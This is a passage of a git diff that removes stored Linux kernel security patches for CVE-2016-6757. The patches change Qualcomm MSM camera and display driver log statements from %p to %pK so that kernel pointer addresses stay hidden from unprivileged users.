-@@ -1238,7 +1238,7 @@ static int32_t msm_cci_i2c_set_sync_prms(struct v4l2_subdev *sd,
- 
- 	cci_dev = v4l2_get_subdevdata(sd);
- 	if (!cci_dev || !c_ctrl) {
--		pr_err("%s:%d failed: invalid params %p %p\n", __func__,
-+		pr_err("%s:%d failed: invalid params %pK %pK\n", __func__,
- 			__LINE__, cci_dev, c_ctrl);
- 		rc = -EINVAL;
- 		return rc;
-@@ -1260,7 +1260,7 @@ static int32_t msm_cci_init(struct v4l2_subdev *sd,
- 
- 	cci_dev = v4l2_get_subdevdata(sd);
- 	if (!cci_dev || !c_ctrl) {
--		pr_err("%s:%d failed: invalid params %p %p\n", __func__,
-+		pr_err("%s:%d failed: invalid params %pK %pK\n", __func__,
- 			__LINE__, cci_dev, c_ctrl);
- 		rc = -EINVAL;
- 		return rc;
-@@ -1539,7 +1539,7 @@ static int32_t msm_cci_write(struct v4l2_subdev *sd,
- 
- 	cci_dev = v4l2_get_subdevdata(sd);
- 	if (!cci_dev || !c_ctrl) {
--		pr_err("%s:%d failed: invalid params %p %p\n", __func__,
-+		pr_err("%s:%d failed: invalid params %pK %pK\n", __func__,
- 			__LINE__, cci_dev, c_ctrl);
- 		rc = -EINVAL;
- 		return rc;
-@@ -1984,7 +1984,7 @@ static int msm_cci_probe(struct platform_device *pdev)
- {
- 	struct cci_device *new_cci_dev;
- 	int rc = 0, i = 0;
--	CDBG("%s: pdev %p device id = %d\n", __func__, pdev, pdev->id);
-+	CDBG("%s: pdev %pK device id = %d\n", __func__, pdev, pdev->id);
- 	new_cci_dev = kzalloc(sizeof(struct cci_device), GFP_KERNEL);
- 	if (!new_cci_dev) {
- 		pr_err("%s: no enough memory\n", __func__);
-@@ -1996,7 +1996,7 @@ static int msm_cci_probe(struct platform_device *pdev)
- 			ARRAY_SIZE(new_cci_dev->msm_sd.sd.name), "msm_cci");
- 	v4l2_set_subdevdata(&new_cci_dev->msm_sd.sd, new_cci_dev);
- 	platform_set_drvdata(pdev, &new_cci_dev->msm_sd.sd);
--	CDBG("%s sd %p\n", __func__, &new_cci_dev->msm_sd.sd);
-+	CDBG("%s sd %pK\n", __func__, &new_cci_dev->msm_sd.sd);
- 	if (pdev->dev.of_node)
- 		of_property_read_u32((&pdev->dev)->of_node,
- 			"cell-index", &pdev->id);
-@@ -2071,7 +2071,7 @@ static int msm_cci_probe(struct platform_device *pdev)
- 		if (!new_cci_dev->write_wq[i])
- 			pr_err("Failed to create write wq\n");
- 	}
--	CDBG("%s cci subdev %p\n", __func__, &new_cci_dev->msm_sd.sd);
-+	CDBG("%s cci subdev %pK\n", __func__, &new_cci_dev->msm_sd.sd);
- 	CDBG("%s line %d\n", __func__, __LINE__);
- 	return 0;
- 
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-index ef07a54..46e8594 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-@@ -265,7 +265,7 @@ static int msm_csid_config(struct csid_device *csid_dev,
- 	void __iomem *csidbase;
- 	csidbase = csid_dev->base;
- 	if (!csidbase || !csid_params) {
--		pr_err("%s:%d csidbase %p, csid params %p\n", __func__,
-+		pr_err("%s:%d csidbase %pK, csid params %pK\n", __func__,
- 			__LINE__, csidbase, csid_params);
- 		return -EINVAL;
- 	}
-@@ -651,7 +651,7 @@ static int32_t msm_csid_cmd(struct csid_device *csid_dev, void __user *arg)
- 	struct csid_cfg_data *cdata = (struct csid_cfg_data *)arg;
- 
- 	if (!csid_dev || !cdata) {
--		pr_err("%s:%d csid_dev %p, cdata %p\n", __func__, __LINE__,
-+		pr_err("%s:%d csid_dev %pK, cdata %pK\n", __func__, __LINE__,
- 			csid_dev, cdata);
- 		return -EINVAL;
- 	}
-@@ -792,7 +792,7 @@ static int32_t msm_csid_cmd32(struct csid_device *csid_dev, void __user *arg)
- 	cdata = &local_arg;
- 
- 	if (!csid_dev || !cdata) {
--		pr_err("%s:%d csid_dev %p, cdata %p\n", __func__, __LINE__,
-+		pr_err("%s:%d csid_dev %pK, cdata %pK\n", __func__, __LINE__,
- 			csid_dev, cdata);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 8363912..7bdaf67 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -497,7 +497,7 @@ static int msm_csiphy_lane_config(struct csiphy_device *csiphy_dev,
- 			val |= csiphy_params->csid_core;
- 		}
- 		msm_camera_io_w(val, csiphy_dev->clk_mux_base);
--		CDBG("%s clk mux addr %p val 0x%x\n", __func__,
-+		CDBG("%s clk mux addr %pK val 0x%x\n", __func__,
- 			csiphy_dev->clk_mux_base, val);
- 		/* ensure write is done */
- 		mb();
-@@ -924,7 +924,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 			mipi_csiphy_glbl_pwr_cfg_addr);
- 	} else {
- 		if (!csi_lane_params) {
--			pr_err("%s:%d failed: csi_lane_params %p\n", __func__,
-+			pr_err("%s:%d failed: csi_lane_params %pK\n", __func__,
- 				__LINE__, csi_lane_params);
- 			return -EINVAL;
- 		}
-@@ -1030,7 +1030,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 			mipi_csiphy_glbl_pwr_cfg_addr);
- 	} else {
- 		if (!csi_lane_params) {
--			pr_err("%s:%d failed: csi_lane_params %p\n", __func__,
-+			pr_err("%s:%d failed: csi_lane_params %pK\n", __func__,
- 				__LINE__, csi_lane_params);
- 			return -EINVAL;
- 		}
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-index 8e50646..c9f2c8c 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-@@ -696,7 +696,7 @@ static long msm_eeprom_subdev_ioctl(struct v4l2_subdev *sd,
- 	struct msm_eeprom_ctrl_t *e_ctrl = v4l2_get_subdevdata(sd);
- 	void __user *argp = (void __user *)arg;
- 	CDBG("%s E\n", __func__);
--	CDBG("%s:%d a_ctrl %p argp %p\n", __func__, __LINE__, e_ctrl, argp);
-+	CDBG("%s:%d a_ctrl %pK argp %pK\n", __func__, __LINE__, e_ctrl, argp);
- 	switch (cmd) {
- 	case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- 		return msm_eeprom_get_subdev_id(e_ctrl, argp);
-@@ -795,7 +795,7 @@ static int msm_eeprom_i2c_probe(struct i2c_client *client,
- 	}
- 	e_ctrl->eeprom_v4l2_subdev_ops = &msm_eeprom_subdev_ops;
- 	e_ctrl->eeprom_mutex = &msm_eeprom_mutex;
--	CDBG("%s client = 0x%p\n", __func__, client);
-+	CDBG("%s client = 0x%pK\n", __func__, client);
- 	e_ctrl->eboard_info = (struct msm_eeprom_board_info *)(id->driver_data);
- 	if (!e_ctrl->eboard_info) {
- 		pr_err("%s:%d board info NULL\n", __func__, __LINE__);
-@@ -1521,7 +1521,7 @@ static long msm_eeprom_subdev_ioctl32(struct v4l2_subdev *sd,
- 	void __user *argp = (void __user *)arg;
- 
- 	CDBG("%s E\n", __func__);
--	CDBG("%s:%d a_ctrl %p argp %p\n", __func__, __LINE__, e_ctrl, argp);
-+	CDBG("%s:%d a_ctrl %pK argp %pK\n", __func__, __LINE__, e_ctrl, argp);
- 	switch (cmd) {
- 	case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- 		return msm_eeprom_get_subdev_id(e_ctrl, argp);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 86d61e7..84bd3fe 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -347,7 +347,7 @@ static int32_t msm_flash_i2c_release(
- 	int32_t rc = 0;
- 
- 	if (!(&flash_ctrl->power_info) || !(&flash_ctrl->flash_i2c_client)) {
--		pr_err("%s:%d failed: %p %p\n",
-+		pr_err("%s:%d failed: %pK %pK\n",
- 			__func__, __LINE__, &flash_ctrl->power_info,
- 			&flash_ctrl->flash_i2c_client);
- 		return -EINVAL;
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c
-index af47235..6b867bf 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c
-@@ -34,7 +34,7 @@ int msm_camera_fill_vreg_params(struct camera_vreg_t *cam_vreg,
- 
- 	/* Validate input parameters */
- 	if (!cam_vreg || !power_setting) {
--		pr_err("%s:%d failed: cam_vreg %p power_setting %p", __func__,
-+		pr_err("%s:%d failed: cam_vreg %pK power_setting %pK", __func__,
- 			__LINE__,  cam_vreg, power_setting);
- 		return -EINVAL;
- 	}
-@@ -1327,7 +1327,7 @@ int msm_camera_power_up(struct msm_camera_power_ctrl_t *ctrl,
- 
- 	CDBG("%s:%d\n", __func__, __LINE__);
- 	if (!ctrl || !sensor_i2c_client) {
--		pr_err("failed ctrl %p sensor_i2c_client %p\n", ctrl,
-+		pr_err("failed ctrl %pK sensor_i2c_client %pK\n", ctrl,
- 			sensor_i2c_client);
- 		return -EINVAL;
- 	}
-@@ -1549,7 +1549,7 @@ int msm_camera_power_down(struct msm_camera_power_ctrl_t *ctrl,
- 
- 	CDBG("%s:%d\n", __func__, __LINE__);
- 	if (!ctrl || !sensor_i2c_client) {
--		pr_err("failed ctrl %p sensor_i2c_client %p\n", ctrl,
-+		pr_err("failed ctrl %pK sensor_i2c_client %pK\n", ctrl,
- 			sensor_i2c_client);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c
-index 6a4dcdc..d09e29d 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c
-@@ -106,7 +106,7 @@ int msm_sensor_power_down(struct msm_sensor_ctrl_t *s_ctrl)
- 	struct msm_camera_i2c_client *sensor_i2c_client;
- 
- 	if (!s_ctrl) {
--		pr_err("%s:%d failed: s_ctrl %p\n",
-+		pr_err("%s:%d failed: s_ctrl %pK\n",
- 			__func__, __LINE__, s_ctrl);
- 		return -EINVAL;
- 	}
-@@ -119,7 +119,7 @@ int msm_sensor_power_down(struct msm_sensor_ctrl_t *s_ctrl)
- 	sensor_i2c_client = s_ctrl->sensor_i2c_client;
- 
- 	if (!power_info || !sensor_i2c_client) {
--		pr_err("%s:%d failed: power_info %p sensor_i2c_client %p\n",
-+		pr_err("%s:%d failed: power_info %pK sensor_i2c_client %pK\n",
- 			__func__, __LINE__, power_info, sensor_i2c_client);
- 		return -EINVAL;
- 	}
-@@ -137,7 +137,7 @@ int msm_sensor_power_up(struct msm_sensor_ctrl_t *s_ctrl)
- 	uint32_t retry = 0;
- 
- 	if (!s_ctrl) {
--		pr_err("%s:%d failed: %p\n",
-+		pr_err("%s:%d failed: %pK\n",
- 			__func__, __LINE__, s_ctrl);
- 		return -EINVAL;
- 	}
-@@ -152,7 +152,7 @@ int msm_sensor_power_up(struct msm_sensor_ctrl_t *s_ctrl)
- 
- 	if (!power_info || !sensor_i2c_client || !slave_info ||
- 		!sensor_name) {
--		pr_err("%s:%d failed: %p %p %p %p\n",
-+		pr_err("%s:%d failed: %pK %pK %pK %pK\n",
- 			__func__, __LINE__, power_info,
- 			sensor_i2c_client, slave_info, sensor_name);
- 		return -EINVAL;
-@@ -208,7 +208,7 @@ int msm_sensor_match_id(struct msm_sensor_ctrl_t *s_ctrl)
- 	const char *sensor_name;
- 
- 	if (!s_ctrl) {
--		pr_err("%s:%d failed: %p\n",
-+		pr_err("%s:%d failed: %pK\n",
- 			__func__, __LINE__, s_ctrl);
- 		return -EINVAL;
- 	}
-@@ -217,7 +217,7 @@ int msm_sensor_match_id(struct msm_sensor_ctrl_t *s_ctrl)
- 	sensor_name = s_ctrl->sensordata->sensor_name;
- 
- 	if (!sensor_i2c_client || !slave_info || !sensor_name) {
--		pr_err("%s:%d failed: %p %p %p\n",
-+		pr_err("%s:%d failed: %pK %pK %pK\n",
- 			__func__, __LINE__, sensor_i2c_client, slave_info,
- 			sensor_name);
- 		return -EINVAL;
-@@ -1450,13 +1450,13 @@ int32_t msm_sensor_init_default_params(struct msm_sensor_ctrl_t *s_ctrl)
- 
- 	/* Validate input parameters */
- 	if (!s_ctrl) {
--		pr_err("%s:%d failed: invalid params s_ctrl %p\n", __func__,
-+		pr_err("%s:%d failed: invalid params s_ctrl %pK\n", __func__,
- 			__LINE__, s_ctrl);
- 		return -EINVAL;
- 	}
- 
- 	if (!s_ctrl->sensor_i2c_client) {
--		pr_err("%s:%d failed: invalid params sensor_i2c_client %p\n",
-+		pr_err("%s:%d failed: invalid params sensor_i2c_client %pK\n",
- 			__func__, __LINE__, s_ctrl->sensor_i2c_client);
- 		return -EINVAL;
- 	}
-@@ -1465,7 +1465,7 @@ int32_t msm_sensor_init_default_params(struct msm_sensor_ctrl_t *s_ctrl)
- 	s_ctrl->sensor_i2c_client->cci_client = kzalloc(sizeof(
- 		struct msm_camera_cci_client), GFP_KERNEL);
- 	if (!s_ctrl->sensor_i2c_client->cci_client) {
--		pr_err("%s:%d failed: no memory cci_client %p\n", __func__,
-+		pr_err("%s:%d failed: no memory cci_client %pK\n", __func__,
- 			__LINE__, s_ctrl->sensor_i2c_client->cci_client);
- 		return -ENOMEM;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-index 36ad847..d075a6d 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-@@ -474,10 +474,8 @@ static int32_t msm_sensor_get_power_down_settings(void *setting,
- 	}
- 	/* Allocate memory for power down setting */
- 	pd = kzalloc(sizeof(*pd) * size_down, GFP_KERNEL);
--	if (!pd) {
--		pr_err("failed: no memory power_setting %p", pd);
-+	if (!pd)
- 		return -EFAULT;
--	}
- 
- 	if (slave_info->power_setting_array.power_down_setting) {
- #ifdef CONFIG_COMPAT
-@@ -541,10 +539,8 @@ static int32_t msm_sensor_get_power_up_settings(void *setting,
- 
- 	/* Allocate memory for power up setting */
- 	pu = kzalloc(sizeof(*pu) * size, GFP_KERNEL);
--	if (!pu) {
--		pr_err("failed: no memory power_setting %p", pu);
-+	if (!pu)
- 		return -ENOMEM;
--	}
- 
- #ifdef CONFIG_COMPAT
- 	if (is_compat_task()) {
-@@ -655,22 +651,20 @@ int32_t msm_sensor_driver_probe(void *setting,
- 
- 	/* Validate input parameters */
- 	if (!setting) {
--		pr_err("failed: slave_info %p", setting);
-+		pr_err("failed: slave_info %pK", setting);
- 		return -EINVAL;
- 	}
- 
- 	/* Allocate memory for slave info */
- 	slave_info = kzalloc(sizeof(*slave_info), GFP_KERNEL);
--	if (!slave_info) {
--		pr_err("failed: no memory slave_info %p", slave_info);
-+	if (!slave_info)
- 		return -ENOMEM;
--	}
- #ifdef CONFIG_COMPAT
- 	if (is_compat_task()) {
- 		struct msm_camera_sensor_slave_info32 *slave_info32 =
- 			kzalloc(sizeof(*slave_info32), GFP_KERNEL);
- 		if (!slave_info32) {
--			pr_err("failed: no memory for slave_info32 %p\n",
-+			pr_err("failed: no memory for slave_info32 %pK\n",
- 				slave_info32);
- 			rc = -ENOMEM;
- 			goto free_slave_info;
-@@ -765,13 +759,13 @@ int32_t msm_sensor_driver_probe(void *setting,
- 	/* Extract s_ctrl from camera id */
- 	s_ctrl = g_sctrl[slave_info->camera_id];
- 	if (!s_ctrl) {
--		pr_err("failed: s_ctrl %p for camera_id %d", s_ctrl,
-+		pr_err("failed: s_ctrl %pK for camera_id %d", s_ctrl,
- 			slave_info->camera_id);
- 		rc = -EINVAL;
- 		goto free_slave_info;
- 	}
- 
--	CDBG("s_ctrl[%d] %p", slave_info->camera_id, s_ctrl);
-+	CDBG("s_ctrl[%d] %pK", slave_info->camera_id, s_ctrl);
- 
- 	if (s_ctrl->is_probe_succeed == 1) {
- 		/*
-@@ -811,12 +805,9 @@ int32_t msm_sensor_driver_probe(void *setting,
- 
- 
- 	camera_info = kzalloc(sizeof(struct msm_camera_slave_info), GFP_KERNEL);
--	if (!camera_info) {
--		pr_err("failed: no memory slave_info %p", camera_info);
-+	if (!camera_info)
- 		goto free_slave_info;
- 
--	}
--
- 	s_ctrl->sensordata->slave_info = camera_info;
- 
- 	/* Fill sensor slave info */
-@@ -828,7 +819,7 @@ int32_t msm_sensor_driver_probe(void *setting,
- 
- 	/* Fill CCI master, slave address and CCI default params */
- 	if (!s_ctrl->sensor_i2c_client) {
--		pr_err("failed: sensor_i2c_client %p",
-+		pr_err("failed: sensor_i2c_client %pK",
- 			s_ctrl->sensor_i2c_client);
- 		rc = -EINVAL;
- 		goto free_camera_info;
-@@ -841,7 +832,7 @@ int32_t msm_sensor_driver_probe(void *setting,
- 
- 	cci_client = s_ctrl->sensor_i2c_client->cci_client;
- 	if (!cci_client) {
--		pr_err("failed: cci_client %p", cci_client);
-+		pr_err("failed: cci_client %pK", cci_client);
- 		goto free_camera_info;
- 	}
- 	cci_client->cci_i2c_master = s_ctrl->cci_i2c_master;
-@@ -1129,7 +1120,7 @@ static int32_t msm_sensor_driver_parse(struct msm_sensor_ctrl_t *s_ctrl)
- 	s_ctrl->sensor_i2c_client = kzalloc(sizeof(*s_ctrl->sensor_i2c_client),
- 		GFP_KERNEL);
- 	if (!s_ctrl->sensor_i2c_client) {
--		pr_err("failed: no memory sensor_i2c_client %p",
-+		pr_err("failed: no memory sensor_i2c_client %pK",
- 			s_ctrl->sensor_i2c_client);
- 		return -ENOMEM;
- 	}
-@@ -1138,7 +1129,7 @@ static int32_t msm_sensor_driver_parse(struct msm_sensor_ctrl_t *s_ctrl)
- 	s_ctrl->msm_sensor_mutex = kzalloc(sizeof(*s_ctrl->msm_sensor_mutex),
- 		GFP_KERNEL);
- 	if (!s_ctrl->msm_sensor_mutex) {
--		pr_err("failed: no memory msm_sensor_mutex %p",
-+		pr_err("failed: no memory msm_sensor_mutex %pK",
- 			s_ctrl->msm_sensor_mutex);
- 		goto FREE_SENSOR_I2C_CLIENT;
- 	}
-@@ -1167,7 +1158,7 @@ static int32_t msm_sensor_driver_parse(struct msm_sensor_ctrl_t *s_ctrl)
- 
- 	/* Store sensor control structure in static database */
- 	g_sctrl[s_ctrl->id] = s_ctrl;
--	CDBG("g_sctrl[%d] %p", s_ctrl->id, g_sctrl[s_ctrl->id]);
-+	CDBG("g_sctrl[%d] %pK", s_ctrl->id, g_sctrl[s_ctrl->id]);
- 
- 	return rc;
- 
-@@ -1191,10 +1182,8 @@ static int32_t msm_sensor_driver_platform_probe(struct platform_device *pdev)
- 
- 	/* Create sensor control structure */
- 	s_ctrl = kzalloc(sizeof(*s_ctrl), GFP_KERNEL);
--	if (!s_ctrl) {
--		pr_err("failed: no memory s_ctrl %p", s_ctrl);
-+	if (!s_ctrl)
- 		return -ENOMEM;
--	}
- 
- 	platform_set_drvdata(pdev, s_ctrl);
- 
-@@ -1238,10 +1227,8 @@ static int32_t msm_sensor_driver_i2c_probe(struct i2c_client *client,
- 
- 	/* Create sensor control structure */
- 	s_ctrl = kzalloc(sizeof(*s_ctrl), GFP_KERNEL);
--	if (!s_ctrl) {
--		pr_err("failed: no memory s_ctrl %p", s_ctrl);
-+	if (!s_ctrl)
- 		return -ENOMEM;
--	}
- 
- 	i2c_set_clientdata(client, s_ctrl);
- 
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c
-index 8b6e3d3..ed0b974 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -64,7 +64,7 @@ static int32_t msm_sensor_driver_cmd(struct msm_sensor_init_t *s_init,
- 
- 	/* Validate input parameters */
- 	if (!s_init || !cfg) {
--		pr_err("failed: s_init %p cfg %p", s_init, cfg);
-+		pr_err("failed: s_init %pK cfg %pK", s_init, cfg);
- 		return -EINVAL;
- 	}
- 
-@@ -106,7 +106,7 @@ static long msm_sensor_init_subdev_ioctl(struct v4l2_subdev *sd,
- 
- 	/* Validate input parameters */
- 	if (!s_init) {
--		pr_err("failed: s_init %p", s_init);
-+		pr_err("failed: s_init %pK", s_init);
- 		return -EINVAL;
- 	}
- 
-@@ -167,12 +167,10 @@ static int __init msm_sensor_init_module(void)
- 	int ret = 0;
- 	/* Allocate memory for msm_sensor_init control structure */
- 	s_init = kzalloc(sizeof(struct msm_sensor_init_t), GFP_KERNEL);
--	if (!s_init) {
--		pr_err("failed: no memory s_init %p", NULL);
-+	if (!s_init)
- 		return -ENOMEM;
--	}
- 
--	CDBG("MSM_SENSOR_INIT_MODULE %p", NULL);
-+	CDBG("MSM_SENSOR_INIT_MODULE %pK", NULL);
- 
- 	/* Initialize mutex */
- 	mutex_init(&s_init->imutex);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c b/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c
-index 947eeaf..82c9e5c5 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c
-@@ -448,7 +448,7 @@ static long msm_ois_subdev_ioctl(struct v4l2_subdev *sd,
- 	struct msm_ois_ctrl_t *o_ctrl = v4l2_get_subdevdata(sd);
- 	void __user *argp = (void __user *)arg;
- 	CDBG("Enter\n");
--	CDBG("%s:%d o_ctrl %p argp %p\n", __func__, __LINE__, o_ctrl, argp);
-+	CDBG("%s:%d o_ctrl %pK argp %pK\n", __func__, __LINE__, o_ctrl, argp);
- 	switch (cmd) {
- 	case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- 		return msm_ois_get_subdev_id(o_ctrl, argp);
-@@ -553,7 +553,7 @@ static int32_t msm_ois_i2c_probe(struct i2c_client *client,
- 		goto probe_failure;
- 	}
- 
--	CDBG("client = 0x%p\n",  client);
-+	CDBG("client = 0x%pK\n",  client);
- 
- 	rc = of_property_read_u32(client->dev.of_node, "cell-index",
- 		&ois_ctrl_t->subdev_id);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6757/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6757/3.10/0001.patch
deleted file mode 100644
index c6534b4b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6757/3.10/0001.patch
+++ /dev/null
@@ -1,683 +0,0 @@
-From cd99d3bbdb16899a425716e672485e0cdc283245 Mon Sep 17 00:00:00 2001
-From: Abhijit Kulkarni <kabhijit@codeaurora.org>
-Date: Wed, 15 Jun 2016 10:30:50 -0700
-Subject: msm: mdss: hide kernel addresses from unprevileged users
-
-for printing kernel pointers which should be hidden from unprivileged
-users, use %pK which evaluates whether kptr_restrict is set.
-
-CRs-Fixed: 987021
-Change-Id: Ie49eee9478f4657cfb2a994ba60da1ec4c356339
-Signed-off-by: Abhijit Kulkarni <kabhijit@codeaurora.org>
-Signed-off-by: Nirmal Abraham <nabrah@codeaurora.org>
----
- drivers/video/msm/mdss/mdp3.c                | 16 ++++++++--------
- drivers/video/msm/mdss/mdp3_ppp_hwio.c       |  8 +++++---
- drivers/video/msm/mdss/mdss_debug.c          |  8 ++++----
- drivers/video/msm/mdss/mdss_dsi.c            | 14 +++++++-------
- drivers/video/msm/mdss/mdss_dsi_host.c       |  2 +-
- drivers/video/msm/mdss/mdss_dsi_panel.c      | 12 ++++++------
- drivers/video/msm/mdss/mdss_fb.c             |  6 +++---
- drivers/video/msm/mdss/mdss_hdmi_tx.c        |  6 +++---
- drivers/video/msm/mdss/mdss_hdmi_util.c      |  4 ++--
- drivers/video/msm/mdss/mdss_mdp.c            |  4 ++--
- drivers/video/msm/mdss/mdss_mdp_debug.c      |  6 +++---
- drivers/video/msm/mdss/mdss_mdp_intf_cmd.c   |  6 +++---
- drivers/video/msm/mdss/mdss_mdp_intf_video.c |  6 +++---
- drivers/video/msm/mdss/mdss_mdp_pipe.c       |  2 +-
- drivers/video/msm/mdss/mdss_mdp_pp.c         | 14 +++++++-------
- drivers/video/msm/mdss/mdss_mdp_util.c       |  8 ++++----
- drivers/video/msm/mdss/mdss_mdp_wb.c         | 10 +++++-----
- drivers/video/msm/mdss/mdss_util.c           |  5 ++---
- 18 files changed, 69 insertions(+), 68 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdp3.c b/drivers/video/msm/mdss/mdp3.c
-index 2a9c915..521eb7e 100644
---- a/drivers/video/msm/mdss/mdp3.c
-+++ b/drivers/video/msm/mdss/mdp3.c
-@@ -1096,7 +1096,7 @@ static int mdp3_res_init(void)
- 
- 	mdp3_res->ion_client = msm_ion_client_create(mdp3_res->pdev->name);
- 	if (IS_ERR_OR_NULL(mdp3_res->ion_client)) {
--		pr_err("msm_ion_client_create() return error (%p)\n",
-+		pr_err("msm_ion_client_create() return error (%pK)\n",
- 				mdp3_res->ion_client);
- 		mdp3_res->ion_client = NULL;
- 		return -EINVAL;
-@@ -1528,7 +1528,7 @@ void mdp3_unmap_iommu(struct ion_client *client, struct ion_handle *handle)
- 	mutex_lock(&mdp3_res->iommu_lock);
- 	meta = mdp3_iommu_meta_lookup(table);
- 	if (!meta) {
--		WARN(1, "%s: buffer was never mapped for %p\n", __func__,
-+		WARN(1, "%s: buffer was never mapped for %pK\n", __func__,
- 				handle);
- 		mutex_unlock(&mdp3_res->iommu_lock);
- 		goto out;
-@@ -1556,7 +1556,7 @@ static void mdp3_iommu_meta_add(struct mdp3_iommu_meta *meta)
- 		} else if (meta->table > entry->table) {
- 			p = &(*p)->rb_right;
- 		} else {
--			pr_err("%s: handle %p already exists\n", __func__,
-+			pr_err("%s: handle %pK already exists\n", __func__,
- 				entry->handle);
- 			BUG();
- 		}
-@@ -1618,7 +1618,7 @@ static int mdp3_iommu_map_iommu(struct mdp3_iommu_meta *meta,
- 	ret = iommu_map_range(domain, meta->iova_addr + padding,
- 			table->sgl, size, prot);
- 	if (ret) {
--		pr_err("%s: could not map %pa in domain %p\n",
-+		pr_err("%s: could not map %pa in domain %pK\n",
- 			__func__, &meta->iova_addr, domain);
- 			unmap_size = padding;
- 		goto out2;
-@@ -1741,12 +1741,12 @@ int mdp3_self_map_iommu(struct ion_client *client, struct ion_handle *handle,
- 		}
- 	} else {
- 		if (iommu_meta->flags != iommu_flags) {
--			pr_err("%s: handle %p is already mapped with diff flag\n",
-+			pr_err("%s: handle %pK is already mapped with diff flag\n",
- 				__func__, handle);
- 			ret = -EINVAL;
- 			goto out_unlock;
- 		} else if (iommu_meta->mapped_size != iova_length) {
--			pr_err("%s: handle %p is already mapped with diff len\n",
-+			pr_err("%s: handle %pK is already mapped with diff len\n",
- 				__func__, handle);
- 			ret = -EINVAL;
- 			goto out_unlock;
-@@ -1868,7 +1868,7 @@ done:
- 		data->addr += img->offset;
- 		data->len -= img->offset;
- 
--		pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%x\n", img->memory_id,
-+		pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%x\n", img->memory_id,
- 			 data->srcp_ihdl, &data->addr, data->len);
- 	} else {
- 		mdp3_put_img(data, client);
-@@ -2101,7 +2101,7 @@ static int mdp3_alloc(struct msm_fb_data_type *mfd)
- 		return ret;
- 	}
- 
--	pr_info("allocating %u bytes at %p (%lx phys) for fb %d\n",
-+	pr_info("allocating %u bytes at %pK (%lx phys) for fb %d\n",
- 		size, virt, phys, mfd->index);
- 
- 	mfd->fbi->screen_base = virt;
-diff --git a/drivers/video/msm/mdss/mdp3_ppp_hwio.c b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-index d8c4168..4317726 100644
---- a/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-+++ b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-@@ -1291,7 +1291,8 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- 		bg_mdp_ops = 0;
- 	}
- 	pr_debug("BLIT FG Param Fmt %d (x %d,y %d,w %d,h %d), ROI(x %d,y %d, w\
--		 %d, h %d) Addr_P0 %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+		%d, h %d) Addr_P0 %pK, Stride S0 %d Addr_P1 %pK,\
-+		Stride S1 %d\n",
- 		blit_op->src.color_fmt, blit_op->src.prop.x, blit_op->src.prop.y,
- 		blit_op->src.prop.width, blit_op->src.prop.height,
